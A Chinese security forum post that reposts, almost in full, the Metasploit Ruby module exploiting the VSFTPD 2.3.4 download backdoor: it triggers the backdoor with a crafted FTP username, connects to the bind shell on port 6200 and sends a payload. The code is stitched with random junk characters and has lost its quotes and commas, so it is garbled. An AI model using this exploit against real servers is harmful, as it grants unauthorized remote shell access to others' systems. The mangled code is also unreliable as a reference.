最近看过此主题的会员

返回列表 发帖
VSFTPD v2.3.4 Backdoor 命令执行漏洞
################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################
; @$ U4 ], j  R! a8 l! ^& ]+ o) D4 ~( N; G% @$ d
, ]1 y2 ~7 z6 s/ K$ Y" \

4 `' b& N! a# m4 K# m8 F7 nrequire msf/core
, _1 s2 v8 m9 a% U, g; n. [& c# a; c
class Metasploit3 < Msf::Exploit::Remote7 Q; H* Z# w3 h5 p0 c
Rank = ExcellentRanking, t) O& L$ U- c9 x7 H

, w* E* c$ m, R1 _" @9 o/ H7 ^' jinclude Msf::Exploit::Remote::Tcp/ h2 k- Y( X5 i5 F* y, S" V5 _" }& J; f

3 _. v# ^4 Q! G' z& @  ldef initialize(info = {})
- j0 ~* Q* D& k1 F/ ]super(update_info(info
; Y# g8 F5 r! a# G. x$ yName => VSFTPD v2.3.4 Backdoor Command Execution# W& U/ c% d8 Q/ E/ \- _
Descript_ion => %q{
# l) Q2 f+ e* V( w2 NThis module exploits a malicious backdoor that was added to the VSFTPD download2 y5 ~5 Z: @, Y2 ~1 R. W
archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between9 a$ \- L6 F! k& x# W' v/ d; b" V
June 30th 2011 and July 1st 2011 according to the most recent information0 L! }7 }0 d- W
available. This backdoor was removed on July 3rd 2011.
5 H0 X1 j& Y5 t9 a1 ?}- g( a6 ^( }7 w% _+ \7 }6 }
Author => [ hdm mc ]! _  ?* F- J/ v- I; ]& ?0 c+ G
License => MSF_LICENSE  x: i7 x2 |# s+ ?* u- d: b5 g
Version => $Revision: 13099 $
/ C4 Q' q, A4 ^+ tReferences =>
4 b1 W$ O: L& k6 F[
; ]- `& Q; Q) x8 M7 a* g[ URL http://pastebin.com/AetT9sS5]$ k4 ~, b" F8 j7 ^" e0 C+ O
[ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
7 @+ a: M$ N7 @9 z; {/ W) B8 X]
5 }* G8 e, A. KPrivileged => true
/ r$ [" K3 o5 f) N& VPlatform => [ unix ]
/ j7 G6 j+ v; ~3 e% {( HArch => ARCH_CMD; f% G" p2 B: S* y2 S' B
Payload =>3 f# j: ]% w) d" c1 \& o& n' c
{
8 t$ o& _9 s( w% |* A+ x" uSpace => 2000
" W: u4 Z. g  \BadChars =>
; R' z3 Q7 L) j7 r( v; g8 L5 `# vDisableNops => true, l2 a6 ^! Q1 v/ Q. |
Compat =>
- r6 S; C( R$ H  N7 S{! D5 ]" W7 W6 B+ N! B" a/ v1 u
PayloadType => cmd_interact& k! Z3 A2 G* ^5 S% {2 U/ b
ConnectionType => find
) ?, k6 C2 r: y}, u+ p6 v  \. P: @8 v
}9 j; T" m. p( o. W
Targets =>8 ^& y% |" J) q0 U- G5 d+ F
[% J! C: r: x( D2 A' A
[ Automatic { } ]) h* r) h' O: Z$ \7 |. |8 \+ v
]
+ ?1 q( d# J4 q  X( {1 ^DisclosureDate => Jul 3 2011) _! x$ b2 J- ~
DefaultTarget => 0))
7 z' a! K7 n1 N- }0 t7 |
4 {: A  j% ]1 I* Iregister_options([ Opt::RPORT(21) ] self.class)" B- P! g# }* _& S; d  O$ W
end0 F) v, I% U4 s* ~, l7 h6 [

4 l( c( a# g; Y) N3 K( e4 mdef exploit
# q& @0 W- G7 s0 p2 h) h$ i% B/ A( {$ B9 n9 C
nsock = self.connect(false {RPORT => 6200}) rescue nil; g; x! l6 t! R+ m
if nsock
7 B* I$ h" _# `+ J  j, U; ~print_status(The port used by the backdoor bind listener is already open)
9 x* e2 \% i% t8 T- j  |. vhandle_backdoor(nsock)6 h& N2 e, e) |$ m+ t% F
return  l0 \" [, ~. Z/ e
end
$ P  N! G# [5 w3 z) e# ]
2 c0 R/ ?& }0 I0 ?0 B& g- K3 z; X# Connect to the FTP service port first- m* x: c; g" s  N8 v' ]
connect8 @/ N5 b: x2 G! |& t
& p& J; K. s+ c2 n. A; L% B
banner = sock.get_once(-1 30).to_s4 k; T9 v- V: o8 Y# ]
print_status(Banner: #{banner.strip})
* g( U+ g" t/ w7 i, x9 f: }3 r
! `% C1 f, K  K9 m: `) Lsock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)  a, n( a% v2 c+ H8 y: `3 Q
)! Z5 l$ c5 e- B3 M4 p: x9 @9 p
resp = sock.get_once(-1 30).to_s
5 ?2 d% X) k% v8 ?" Pprint_status(USER: #{resp.strip})( L$ [8 k* }  C6 J" ?
7 k7 h7 b" t4 o& [
if resp =~ /^530 /7 I4 S+ H( i  t3 ]* M( O- c
print_error(This server is configured for anonymous only and the backdoor code cannot be reached)1 y$ e6 N" q  y2 b$ T
disconnect2 @8 _+ _0 h9 I
return
6 ?) e& L$ {/ A: w# Rend) a+ t( O4 n$ b( H/ n' U4 l5 @

) |+ K+ L5 M8 i$ I+ ^& [( Pif resp !~ /^331 /) |: `6 ?; n& S( {+ d  X
print_error(This server did not respond as expected: #{resp.strip})
) M) p" h. T. J2 d: i0 Z5 X. pdisconnect
1 P, i3 X' D6 S  }return
7 V- Z9 i$ w: H: e9 Mend" v5 O4 i! Y$ S" N. Y8 N
: U2 C5 \5 ~6 H( l
sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}0 ~  {% T& g8 A& {5 Q
)$ T& b& H. L+ h# e3 z
7 x0 |; v9 R  y
# Do not bother reading the response from password just try the backdoor
+ p: P' I, y& Cnsock = self.connect(false {RPORT => 6200}) rescue nil/ S0 }8 S1 F+ ?& w1 Q' L: d" r
if nsock
5 ^2 b# r+ r5 e. G" Y2 E- o( Jprint_good(Backdoor service has been spawned handling...)7 m4 B  V% o2 p& r1 }
handle_backdoor(nsock)
5 ~* d9 P0 i4 F. B- b: l* G4 Preturn
7 c5 F# ]1 O( J- S. _end0 n$ O% [( ?+ W3 I2 a1 A( ^0 |" t, Q

# |% k5 G0 h% a% Edisconnect
  ?$ b# o- Q$ K- \% [3 B3 o7 I% _- I' I& j# z
end6 ^1 L6 Y7 e3 ^& n

% f4 N6 }' b8 o" ?2 k& ddef handle_backdoor(s)
+ F7 j1 ?. I+ k$ C8 @6 h0 i$ ?6 a/ `
1 ^* t" W! O+ J% t4 K' fs.put(id4 a: P# K) {( P9 ]7 a7 E1 s
)
6 I! A5 d! v, [; w" [
0 h4 O: S: c3 W4 Sr = s.get_once(-1 5).to_s. K5 t  a1 }+ w4 F8 U! t
if r !~ /uid=/
0 |' S7 @$ \5 `) Sprint_error(The service on port 6200 does not appear to be a shell)
) [/ A1 z, ^8 O# Edisconnect(s)# p+ k3 q2 [' A
return6 M3 `& I% t' z5 y& _; I4 h2 M' p
end/ [% R7 c% r& {( b( B

; A9 T. s- b* Jprint_good(UID: #{r.strip})
7 i2 l. F8 |: j/ [  w3 t. z! g, a. Y- ~% Q
s.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)9 n" {7 n0 a3 n, G$ d# p0 Q
handler(s)6 d( `/ z$ q0 ~
end
. t1 l& D3 D; H" U5 W9 J8 ?3 D+ U  c
) @6 X: r: x5 L1 R$ ~end复制代码+ O- `( I, S. c1 y9 T; T+ P

7 j# j8 \) p: ]* K0 b: t9 v0 o8 F2 }# j0 f! o! q
8 m% a7 E* k; X* I5 t

6 f4 a; S) M6 J" i0 B
, M2 D  V+ W7 o7 v9 z' ^) D" X/ b9 j% i
: K. w1 J, `/ F8 L! L! t
( T7 A' [0 b4 Q9 Y* y

% ?1 z7 a8 i) ]0 g! z  ]3 }4 r4 H! \* ?" |; A2 H; w- O
$ h/ H- \+ \% o5 {/ ^
2 T5 J. M4 s* D$ c
1 [4 d) a9 o( ~+ @4 z4 x1 ~
" N; t; n4 T  y  h+ C
' f4 X" G, O$ U1 Z& M& R* \  G
2 B2 ^# ]6 t+ `0 {! {
( ]4 h5 u/ h. }9 ~+ t
2 M- j' s% \5 O1 a& c
公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

返回列表